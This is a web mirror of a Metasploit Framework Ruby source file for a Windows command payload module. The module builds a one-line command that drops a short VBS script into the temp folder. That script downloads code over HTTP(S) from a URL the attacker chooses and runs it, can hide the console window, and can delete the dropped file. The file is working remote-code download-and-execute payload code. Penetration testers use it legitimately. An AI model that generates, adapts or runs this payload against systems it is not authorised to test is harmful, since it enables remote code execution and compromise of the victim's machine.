Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = :dynamic
8
9
include Msf::Payload::Single
10
include Msf::Sessions::CommandShellOptions
11
12
def initialize(info = {})
13
super(
14
merge_info(
15
info,
16
'Name' => 'Windows Executable Download and Evaluate VBS',
17
'Description' => %q{
18
Downloads a file from an HTTP(S) URL and executes it as a vbs script.
19
Use it to stage a vbs encoded payload from a short command line.
20
},
21
'Author' => 'scriptjunkie',
22
'License' => BSD_LICENSE,
23
'Platform' => 'win',
24
'Arch' => ARCH_CMD,
25
'Handler' => Msf::Handler::None,
26
'Session' => Msf::Sessions::CommandShell,
27
'PayloadType' => 'cmd',
28
'RequiredCmd' => 'wscript',
29
'Payload' => {
30
'Offsets' => {},
31
'Payload' => ''
32
}
33
)
34
)
35
36
register_options(
37
[
38
OptString.new('URL', [ true, 'The pre-encoded URL to the script' ]),
39
OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),
40
OptBool.new('INCLUDEWSCRIPT', [ true, 'Include the wscript command', false ]),
41
OptBool.new('DELETE', [ true, 'Delete created .vbs after download', false ])
42
]
43
)
44
end
45
46
def generate(_opts = {})
47
return super + command_string
48
end
49
50
def command_string
51
# Keep variable names short.
52
vbsname = Rex::Text.rand_text_alpha(1..2)
53
xmlhttpvar = Rex::Text.rand_text_alpha(1..2)
54
55
command = ''
56
command << 'cmd.exe /q /c ' if datastore['INCLUDECMD']
57
command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):" \
58
"#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:" \
59
"#{xmlhttpvar}.Send:" \
60
"Execute #{xmlhttpvar}.responseText"
61
command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
62
63
# "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
64
# disappears quickly before the wscript libraries load and the file downloads
65
command << " >#{vbsname}.vbs" \
66
'&start '
67
command << 'wscript ' if datastore['INCLUDEWSCRIPT']
68
command << "#{vbsname}.vbs"
69
end
70
end
71
72